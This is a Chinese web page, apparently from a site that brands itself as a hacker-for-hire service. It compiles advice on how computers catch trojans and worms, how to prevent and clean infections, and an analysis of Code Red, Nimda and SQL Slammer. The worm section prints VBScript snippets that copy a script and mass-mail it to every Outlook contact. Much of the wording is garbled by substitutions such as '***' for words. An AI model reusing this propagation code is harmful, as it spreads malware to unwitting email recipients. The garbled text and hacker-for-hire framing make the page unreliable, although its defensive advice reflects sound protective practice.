当前位置:首页 > 黑客技术 > 正文内容

哪些行为能导致电脑中木马病毒(哪些行为可能导致电脑被安装木马程序)

hacker2年前 (2022-07-03)黑客技术91

文章大纲:

电脑怎么会中木马病毒的

一、 首先我们先明确一下什么是木马病毒:

木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代 *** 的安全运行。

二.电脑感染木马病毒的原因有以下几方面:

1.网页被挂病毒。

2.电脑裸奔,无防病毒软件。

3.执行一些不安全的程序。

4.U盘等不安全介质。

5.电脑漏洞不及时补,被后台种毒。

为了电脑不中病毒要注意以下几方面:

1.更新系统补丁,避免病毒通过系统漏洞感染计算机;

2.设置强壮管理员登录密码(8位以上),且定期更换密码;

3.及时更新杀毒软件,并定期的进行全盘杀毒;

4.不要随意打开陌生的电子邮件和好友发来的陌生链接;

5.不要随意下载功能插件;

6.尽量到正规门户网站下载软件程序;

7.不要随意下载“破解版”、“汉化版”程序;

8.某些正常软件安装程序中可能也会捆绑恶意程序,安装时须谨慎。

三、电脑中毒之后的解决 ***

使用杀毒软件查杀电脑

如果电脑本身没有过多的资料,可以直接重装电脑,这样来得最彻底。如果你的电脑是ghost版本的电脑,可以直接选择一件ghost还原你的电脑。

当然还可以手动清理。

电脑中毒的因素有哪几种?

电脑中毒的原因有很多,有的人的电脑突然中毒都不知道是为什么?其实不难发现电脑中毒的原因,比如我们在打开网页的时候,那个网页就是有病毒的,或是我们接收了有病毒的文件等。下面跟着三八女性网的小编一起来了解一下常见的电脑中毒原因有哪些?如何判断自己的电脑有没有中毒?

电脑中毒是我们在使用电脑的时候,最不想遇到的事情。如果要想知道电脑会中毒的原因,我们就可以避免电脑中毒哦。三八女性网觉得只要在日常使用电脑的时候,不要去做会中病毒的可能,那么电脑就不会中毒啦。

常见的电脑中毒原因有哪些

电脑中毒的可能有很多种;比如:上网浏览网页,下载软件文件,接收别人发来的东西,连接U盘手机,放光盘,漏洞没有修复,导致病毒入侵等等。

1、点击了含病毒的网站;

2、下载了含病毒的程序;

3、通过U盘将病毒传到电脑;

4、通过系统漏洞导致电脑中病毒。

常见的电脑中毒原因有哪些.png

(图片转自百度图片)

如何判断自己的电脑有没有中毒

如果需要了解自己电脑是否已经感染了病毒,可以使用以下 *** :

直接使用杀毒软件进行病毒查杀,如果扫描出可疑文件即为感染了病毒。

按下“Ctrl+Alt+Delete”组合键弹出“任务管理器”,查看是否存在可疑进程,有可疑的、不能直接结束的进程即为感染了病毒。

查看系统关键目录,如果存在可疑文件即为中毒。

如何判断自己的电脑有没有中毒.png

(图片转自百度图片)

电脑中毒后怎么解决

1、首先将电脑上的 *** 切断,不让病毒窃取电脑的信息发送到外面,这样减少造成电脑上面的重要信息的流失。切断 *** 的 *** 可以直接将网线拔掉,或者断开 *** 连接即可。

2、当然断网之后就可用杀毒软件查杀病毒了。但是小编提醒用户如果电脑上有重要文件的话,更好是先将其备份到其他设备吧。防止电脑在查杀病毒的时候,把一些文件一起给查杀掉了。

3、打开杀毒软件,建议用360、卡巴斯基、金山毒霸等杀毒软件都是可以的。当然还可以进入dos上面来查杀电脑全盘。在外面查杀到病毒之后,有的网友直接是将其查杀删除掉。但建议将其设置为“隔离”的话,就不会因为误删文件导致系统文件丢失了。

4、最后如果电脑上有重要的信息的话,比如qq密码,游戏账号密码的话,建议更改下密码等信息,防止病毒窃取的信息来盗取你游戏的信息。更改了信息的话就不会造成电脑数据的丢失了。

如果你杀毒软件查杀不掉病毒的话,就将电脑系统重装吧。或者一键还原的未被中毒的时间即可。

电脑中毒后怎么解决.png

(图片转自百度图片)

电脑病毒有哪些种类

文件型电脑病毒

文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等...每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。

复合型电脑病毒

复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。

宏病毒

宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒更先在1995年被发现,在不久后已成为最普遍的电脑病毒。

特洛伊/特洛伊木马

特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。

蠕虫病毒

蠕虫是另一种能自行复制和经由 *** 扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用 *** 去扩散。从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件发给多个用户。有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。

其他电脑病毒/恶性程序码

恶意程序通常是指带有攻击意图所编写的一段程序。这些威胁可以分成两个类别:需要宿主程序的威胁和彼此独立的威胁。前者基本上是不能独立于某个实际的应用程序、实用程序或系统程序的程序片段;后者是可以 *** 作系统调度和运行的自包含程序。也可以将这些软件威胁分成不进行复制工作和进行复制工作的。

电脑病毒有哪些种类.png

(图片转自百度图片)

使用电脑注意事项

1、安装杀毒软件还是必要的,要及时更新病毒库,还要装防火墙(防木马、黑客攻击等),定期杀毒,维护好电脑运行安全;

2、修复漏洞和补丁;

3、平时不要上一些不明网站,不要随便下载东西;

4、还要提防随身移动存储设备(如U盘等,最近U盘病毒挺猖獗的);

5、不进不明不网站,不收奇怪邮件。下载完压缩包文件后先进行病毒扫描;

6、关闭不必要的端口;

7、要是有时间和精力的话,学一些电脑的常用技巧和知识;

使用电脑注意事项.png

(图片转自百度图片)

总结:相信大家通过以上文章已经了解到常见的电脑中毒原因有哪些,以及如何判断自己的电脑有没有中毒等相关信息。电脑中毒是非常苦恼的,有的人就因为电脑中毒而失去重要文件,还会导致失去工作或是重要合作。三八女性网的小编觉得大家平时可以多了解一下关于怎么护理电脑,以及电脑杀毒等等。

什么原因会导致电脑有木马

中木马和中病毒的原因差不多如下:

蠕虫病毒及防范措施 (转载)

凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说,蠕虫也是一种病毒! *** 蠕虫病毒,作为对互联网危害严重的 一种计算机程序,其破坏力和传染性不容忽视。与传统的病毒不同,蠕虫病毒以计算机为载体,以 *** 为攻击对象!本文中将蠕虫病毒分为针对企业 *** 和个人用户2类,并从企业用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!

本文根据蠕虫病毒的发作机制,将其分为利用系统级别漏洞(主动传播)和利用社会工程学(欺骗传播)两种,并从用户角度中将蠕虫病毒分为针对企业 *** 和个人用户2类,从企业用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!

一、蠕虫病毒的定义

1.蠕虫病毒的定义

计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当 *** 迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒有着很大的区别。对于蠕虫,现在还没有一个成套的理论体系,一般认为,蠕虫是一种通过 *** 传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),对 *** 造成拒绝服务,以及和黑客技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能比拟的, *** 的发展使得蠕虫可以在短短的时间内蔓延整个 *** ,造成 *** 瘫痪!

根据使用者情况可将蠕虫病毒分为2类,一种是面向企业用户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个互联网可造成瘫痪性的后果!以“红色代码”,“尼姆达”,以及最新的“sql蠕虫王”为代表。另外一种是针对个人用户的,通过 *** (主要是电子邮件,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求职信病毒为例.在这两类中,之一类具有很大的主动攻击性,而且爆发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。第二种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏洞,更多的是利用社会工程学()对用户进行欺骗和诱使,这样的病毒造成的损失是非常大的,同时也是很难根除的,比如求职信病毒,在2001年就已经被各大杀毒厂商发现,但直到2002年底依然排在病毒危害排行榜的首位就是证明!出得在接下来的内容中,将分别分析这两种病毒的一些特征及防范措施!

2.蠕虫病毒与一般病毒的异同

蠕虫也是一种病毒,因此具有病毒的共同特征。一般的病毒是需要的寄生的,它可以通过自己指令的执行,将自己的指令代码写到其他程序的体内,而被感染的文件就被称为”宿主”,例如,windows下可执行文件的格式为pe格式(Portable Executable),当需要感染pe文件时,在宿主程序中,建立一个新节,将病毒代码写到新节中,修改的程序入口点等,这样,宿主程序执行的时候,就可以先执行病毒程序,病毒程序运行完之后,在把控制权交给宿主原来的程序指令。可见,病毒主要是感染文件,当然也还有像DIRII这种链接型病毒,还有引导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,这张软盘用在其他机器上后,同样也会感染其他机器,所以传播方式也是用软盘等方式。

蠕虫一般不采取利用pe格式插入文件的 *** ,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的共享文件夹,电子邮件email, *** 中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。 *** 的发展也使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!

可以预见,未来能够给 *** 带来重大灾难的主要必定是 *** 蠕虫!

3.蠕虫的破坏和发展趋势

1988年一个由美国CORNELL大学研究生莫里斯编写的蠕虫病毒蔓延造成了数千台计算机停机,蠕虫病毒开始现身 *** ;而后来的红色代码,尼姆达病毒疯狂的时候,造成几十亿美元的损失;北京时间2003年1月26日, 一种名为“2003蠕虫王”的电脑病毒迅速传播并袭击了全球,致使互联网网路严重堵塞,作为互联网主要基础的域名服务器(DNS)的瘫痪造成网民浏览互联网网页及收发电子邮件的速度大幅减缓,同时银行自动提款机的运作中断, 机票等 *** 预订系统的运作中断,信用卡等收付款系统出现故障!专家估计,此病毒造成的直接经济损失至少在12亿美元以上!

通过对以上蠕虫病毒的分析,可以知道,蠕虫发作的一些特点和发展趋势:

1.利用操作系统和应用程序的漏洞主动进行攻击.. 此类病毒主要是“红色代码”和“尼姆达”,以及至今依然肆虐的”求职信”等.由于IE浏览器的漏洞(Iframe Execcomand),使得感染了“尼姆达”病毒的邮件在不去手工打开附件的情况下病毒就能激活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播。Sql蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击!

2.传播方式多样 如“尼姆达”病毒和”求职信”病毒,可利用的传播途径包括文件、电子邮件、Web服务器、 *** 共享等等。

3.病毒 *** 技术与传统的病毒不同的是,许多新病毒是利用当前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技术,可以潜伏在HTML页面里,在上网浏览时触发。

4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例,感染后的机器的web目录的scripts下将生成一个root.exe,可以远程执行任何命令,从而使黑客能够再次进入!二、 *** 蠕虫病毒分析和防范。

蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷。软件上的缺陷,如远程溢出,微软ie和outlook的自动执行漏洞等等,需要软件厂商和用户共同配合,不断的升级软件。而人为的缺陷,主要是指的是计算机用户的疏忽。这就是所谓的社会工程学(social engineering),当收到一封邮件带着病毒的求职信邮件时候,大多数人都会报着好奇去点击的。对于企业用户来说,威胁主要集中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范第二种缺陷。

1.利用系统漏洞的恶性蠕虫病毒分析

在这种病毒中,以红色代码,尼姆达和sql蠕虫为代表!他们共同的特征是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存在这样的漏洞比较普遍,使得病毒很容易的传播!而且攻击的对象大都为服务器,所以造成的 *** 堵塞现象严重!

以2003年1月26号爆发的sql蠕虫为例,爆发数小时内席卷了全球 *** ,造成 *** 大塞车.亚洲国家中以人口上网普及率达七成的韩国所受影响较为严重。韩国两大 *** 业KFT及***电讯公司,系统都陷入了瘫痪,其它的 *** 用户也被迫断线,更为严重的是许多银行的自动取款机都无法正常工作, 美国许美国银行统计,该行的13000台自动柜员机已经无法提供正常提款。 *** 蠕虫病毒开始对人们的生活产生了巨大的影响!

这次sql蠕虫攻击的是微软数据库系Microsoft SQL Server 2000的,利用了MSSQL2000服务远程堆栈缓冲区溢出漏洞, Microsoft SQL Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统。SQL Server监听UDP的1434端口,客户端可以通过发送消息到这个端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是TCP),但是此程序存在严重漏洞,当客户端发送超长数据包时,将导致缓冲区溢出,黑客可以利用该漏洞在远程机器上执行自己的恶意代码。

微软在2000年7月份的时候就为这个漏洞发布了一个安全公告,但当sql蠕虫爆发的时候,依然有大量的装有ms sqlserver 2000的服务器没有安装最新的补丁,从而被蠕虫病毒所利用,蠕虫病毒通过一段376个字节的恶意代码,远程获得对方主机的系统控制权限, 取得三个Win32 API地址,GetTickCount、socket、sendto,接着病毒使用GetTickCount获得一个随机数,进入一个死循环继续传播。在该循环中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有255台可能存在机器。由于这是一个死循环的过程,发包密度仅和机器性能和 *** 带宽有关,所以发送的数据量非常大。该蠕虫对被感染机器本身并没有进行任何恶意破坏行为,也没有向硬盘上写文件,仅仅存在与内存中。对于感染的系统,重新启动后就可以清除蠕虫,但是仍然会重复感染。由于发送数据包占用了大量系统资源和 *** 带宽,形成Udp Flood,感染了该蠕虫的 *** 性能会极度下降。一个百兆 *** 内只要有一两台机器感染该蠕虫就会导致整个 *** 访问阻塞。

通过以上分析可以知道,此蠕虫病毒本身除了对 *** 产生拒绝服务攻击外,并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入破坏代码,后果将不堪设想!

2.企业防范蠕虫病毒措施

此次sql蠕虫病毒,利用的漏洞在2002年7月份微软的一份安全公告中就有详细说明!而且微软也提供了安全补丁提供下载,然而在时隔半年之后互联网上还有相当大的一部分服务器没有安装最新的补丁,其 *** 管理员的安全防范意识可见一斑!

当前,企业 *** 主要应用于文件和打印服务共享、办公自动化系统、企业业务(MIS)系统、Internet应用等领域。 *** 具有便利信息交换特性,蠕虫病毒也可以充分利用 *** 快速传播达到其阻塞 *** 目的。企业在充分地利用 *** 进行业务处理时,就不得不考虑企业的病毒防范问题,以保证关系企业命运的业务数据完整不被破坏。

企业防治蠕虫病毒的时候需要考虑几个问题:病毒的查杀能力,病毒的监控能力,新病毒的反应能力。而企业防毒的一个重要方面是是管理和策略。推荐的企业防范蠕虫病毒的策略如下:

(1)加强 *** 管理员安全管理水平,提高安全意识。由于蠕虫病毒利用的是系统漏洞进行攻击,所以需要在之一时间内保持系统和应用软件的安全性,保持各种操作系统和应用软件的更新!由于各种漏洞的出现,使得安全不在是一种一劳永逸的事,而作为企业用户而言,所经受攻击的危险也是越来越大,要求企业的管理水平和安全意识也越来越高!

(2)建立病毒检测系统。能够在之一时间内检测到 *** 异常和病毒攻击。

(3)建立应急响应系统,将风险减少到最小!由于蠕虫病毒爆发的突然性,可能在病毒发现的时候已经蔓延到了整个 *** ,所以在突 *** 况下,建立一个紧急响应系统是很有必要的,在病毒爆发的之一时间即能提供解决方案。

(4)建立灾难备份系统。对于数据库和数据系统,必须采用定期备份,多机备份措施,防止意外灾难下的数据丢失!

(5)对于局域网而言,可以采用以下一些主要手段:A.在因特网接入口处安装防火墙式防杀计算机病毒产品,将病毒隔离在局域网之外。B.对邮件服务器进行监控,防止带毒邮件进行传播!C.对局域网用户进行安全培训。D.建立局域网内部的升级系统,包括各种操作系统的补丁升级,各种常用的应用软件升级,各种杀毒软件病毒库的升级等等!3.对个人用户产生直接威胁的蠕虫病毒

在以上分析的蠕虫病毒中,只对安装了特定的微软组件的系统进行攻击,而对广大个人用户而言,是不会安装iis(微软的因特网服务器程序,可以使允许在网上提供web服务)或者是庞大的数据库系统的!因此上述病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过 *** 产生影响),但接下来分析的蠕虫病毒,则是对个人用户威胁更大,同时也是最难以根除,造成的损失也更大的一类蠕虫病毒!

对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为电子邮件(Email)以及恶意网页等等!

对于利用email传播得蠕虫病毒来说,通常利用的是社会工程学(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的方式进行传播!

恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,在很多黑客网站竟然出现了关于用网页进行破坏的技术的论坛,并提供破坏程序代码下载,从而造成了恶意网页的大面积泛滥,也使越来越多的用户遭受损失。

对于恶意网页,常常采取vb script和java script编程的形式!由于编程方式十分的简单!所以在网上非常的流行!

Vb script和java script是由微软操作系统的wsh(Windows Scripting HostWindows脚本主机)解析并执行的,由于其编程非常简单,所以此类脚本病毒在网上疯狂传播,疯狂一时的爱虫病毒就是一种vbs脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚本编程的人就可以修改其代码,形成各种各样的变种。

面以一个简单的脚本为例:Set objFs=CreateObject (“Scripting.FileSystemObject”)(创建一个文件系统对象)

objFs.CreateTextFile ("C:virus.txt", 1)(通过文件系统对象的 *** 创建了TXT文件)

如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为:

objFs.GetFile (WScript.ScriptFullName).Copy ("C:virus.vbs")

就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我复制的功能,已经具备病毒的基本特征——自我复制能力。

此类病毒往往是通过邮件传播的,在vb script中调用邮件发送功能也非常的简单,病毒往往采用的 *** 是向outlook中的地址薄中的邮件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如下:

Set objOA=Wscript.CreateObject ("Outlook.Application")(创建一个OUTLOOK应用的对象)

Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间)

For i=1 to objMapi.AddressLists.Count(遍历地址簿)

Set objAddList=objMapi.AddressLists (i)

For j=1 To objAddList. AddressEntries.Count

Set objMail=objOA.CreateItem (0)

objMail.Recipients.Add (objAddList. AddressEntries (j))(取得收件人邮件地址 )

objMail.Subject="你好!" (设置邮件主题,这个往往具有很大的诱惑性质)

objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容)

objMail.Attachments.Add (“c:virus.vbs")(把自己作为附件扩散出去 )

objMail.Send(发送邮件)

Next

Next

Set objMapi=Nothing(清空objMapi变量,释放资源)

set objOA=Nothing(清空objOA变量)

这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自己作为附件扩散出去。这段代码中的之一行是创建一个Outlook的对象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中的电子邮件地址发送内容相同的信件。这就是蠕虫的传播性。

由此可以看出,利用vb script编写病毒是非常容易的,这就使得此类病毒的变种繁多,破坏力极大,同时也是非常难以根除的!

4.个人用户对蠕虫病毒的防范措施

通过上述的分析,我们可以知道,病毒并不是非常可怕的, *** 蠕虫病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏洞!所以防范此类病毒需要注意以下几点:

(1)购合适的杀毒软件! *** 蠕虫病毒的发展已经使传统的杀毒软件的“文件级实时监控系统”落伍,杀毒软件必须向内存实时监控和邮件实时监控发展!另外面对防不胜防的网页病毒,也使得用户对杀毒软件的要求越来越高!在杀毒软件市场上,赛门铁克公司的norton系列杀毒软件在全球具有很大的比例!经过多项测试,norton杀毒系列软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒,而且对网页病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的水平。像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功能,从而对蠕虫兼木马程序有很大克 *** 用。

(2)经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依据的,而病毒每天都层出不穷,尤其是在 *** 时代,蠕虫病毒的传播速度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!

(3)提高防杀毒意识.不要轻易去点击陌生的站点,有可能里面就含有恶意代码!

当运行IE时,点击“工具→Internet选项→安全→ Internet区域的安全级别”,把安全级别由“中”改为“高” 。因为这一类网页主要是含有恶意代码的ActiveX或Applet、 JavaScript的网页文件 ,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以大大减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用ActiveX的网站无法浏览。

(4)不随意查看陌生邮件,尤其是带有附件的邮件,由于有的病毒邮件能够利用ie和outlook的漏洞自动执行,所以计算机用户需要升级ie和outlook程序,及常用的其他应用程序!

三、小结

*** 蠕虫病毒作为一种互联网高速发展下的一种新型病毒,必将对 *** 产生巨大的危险。在防御上,已经不再是由单独的杀毒厂商所能够解决,而需要 *** 安全公司,系统厂商,防病毒厂商及用户共同参与,构筑全方位的防范体系!

哪些可以导致电脑中病毒?

您好:

关于系统的安全性,瑞星工程师给您如下建议:

1.更新系统补丁,避免病毒通过系统漏洞感染计算机;

2.设置强壮管理员登录密码(8位以上),且定期更换密码;

3.及时更新杀毒软件,并定期的进行全盘杀毒;

4.不要随意打开陌生的电子邮件和好友发来的陌生链接;

5.不要随意下载功能插件;

6.尽量到正规门户网站下载软件程序;

7.不要随意下载“破解版”、“汉化版”程序;

8.某些正常软件安装程序中可能也会捆绑恶意程序,安装时须谨慎;

9.接入移动存储设备时,不要双击打开,选择鼠标右键的打开方式。

电脑一般在哪些情况下会中病毒?

电脑一般在什么情况下会中病毒

一般电脑正常实用是不会中病毒的

只要你的电脑与外界有数据传输,就有可能中病毒(有点吓人

:))

1上网时候打开网页(这个过程其实是电脑把 *** 上的网页信息下载到电脑硬盘上临时文件的位置暂时存放,如果网页中有病毒代码等那么你的电脑会种病毒);2光盘,软盘,U盘等移动存储工具,读取的过程中可以把别的主机中病毒带入你的主机中,3下载的文件中带有病毒,运行后电脑中毒。等

电脑中毒好比人得流行病一样,只有和对方“有毒”得东西接触了才可能中毒,防范是必须得,那么你就需要安装一个杀毒软件,在有杀毒软件得情况下中毒机会减少到更低。要及时更新杀毒软件哦。

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时接单的网站发布,如需转载请注明出处。

本文链接:https://szlqgy.com/19782.html

“哪些行为能导致电脑中木马病毒(哪些行为可能导致电脑被安装木马程序)” 的相关文章

分布式光伏发电(寻找光伏投资公司合作)

利益分配,银行是最精明的。皇明光伏的在内蒙有样板可以考察。 接入客户侧的分布式光伏发电项目。 现在我国分布式光伏发电的难点我觉得是投融资方面,比如说接受程度。工程施工人员应具备电工进网作业许可证或其他符合国家规定的资质、在湖北这边、现在光伏的推广有很多问题,在雾霾严重的今天,光伏电站作为可再生的清洁...

核磁共振仪价格(低频共振仪多少钱一台)

1200万左右。2000多万呢,一般300,现在的价格大概要400万以上.一般200万左右到2000万左右不等再看看别人怎么说的。 要看是几排的。它的孔径达到了惊人的74厘米。 而且是新颖的椭圆形,还有片子都是从国外进口的。 临床上应用的类型主。售价人民币06亿,2000万之间。而且是新颖的椭圆形,...

最潮老公的称呼(微信老公备注洋气点的)

他说叫老公可以叫爸爸,你可以给他备注一个我的宝贝或者,这个就看自己的心意了,应该是7”等于妻”把你标注为他的媳妇看来他比较喜欢数字你好信看看他微信里还有别的数字,宝贝,这个没有特殊的要求。 爱人爱人这一称谓最早见于新文学作品之中。 亲爱的、或者你直接备注他一个小名儿。 官人官人。点开第一个就是了,因...

随笔800字(随笔800字初中叙事作文)

至于为什么会觉得自己傻,而是用低的姿态欣然接受他的批评。天,太阳的心情也不错。就像那溪水般潺潺流走。经历,死寂的大地逐渐变得生气蓬勃,是真的不知道过去自己怎么会有那样的行为。 一个人静静的待着,心里便懊恼一次,感受秋天这几天。 。时代的发展只有你勇于展示自我,打开窗,所以是原创随笔最好内容什么的附和...

小说历史的尘埃(历史的尘埃txt精校下载)

是否我前面错过了。具体点嘛。.并以重伤高残的结局为阿萨书名历史的尘埃作者知秋简介以著名电脑游戏英雄无敌3作为全书框架.破釜沉舟的英雄是.曾以小说历史的尘埃。 有的发到邮箱qq谢谢,不管你爱与不爱都只是其中的尘.。从最低级地魔法飞弹到,怎么小懿,推荐★历史的尘埃作者知秋TXT格式。 如同他之前所说德。...

鸟哥的私房菜(鸟叔linux私房菜基础篇)

比较适,还有软件的安装,新版的更好一些第三版应该是在老板本的基础上添加和修改了一些新,有第四版了。。而linux就该这么学内容相对精简,有一些重要的开发环境和架构会重度依赖某些操作系统。 这本书怎么样,有人说第三版的排版很多错误,XXXX从入门到精通鸟哥的书不适合完全无基础的人看,建议入第四版。 第...

评论列表

访客
2年前 (2022-07-03)

与编程技术实现的,易于修改以产生新的变种,从而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技术,可以潜伏在HTML页面里,在上网浏览时触发。 4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例,感染后的机器的web目录的scripts

访客
2年前 (2022-07-03)

击外,并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入破坏代码,后果将不堪设想! 2.企业防范蠕虫病毒措施 此次sql蠕虫病毒,利用的漏洞在2002年7月份微软的一份安全公告中就有详细说明!而且微软也提供了安全补丁提供下载,然而在时隔半年之后互联网上还有相当大的一部分服

访客
2年前 (2022-07-03)

行后电脑中毒。等电脑中毒好比人得流行病一样,只有和对方“有毒”得东西接触了才可能中毒,防范是必须得,那么你就需要安装一个杀毒软件,在有杀毒软件得情况下中毒机会减少到最低。要及时更新

访客
2年前 (2022-07-03)

病毒程序,病毒程序运行完之后,在把控制权交给宿主原来的程序指令。可见,病毒主要是感染文件,当然也还有像DIRII这种链接型病毒,还有引导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,这张软盘用在其他机器上后,同样

访客
2年前 (2022-07-03)

脚本等全部禁止就可以大大减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。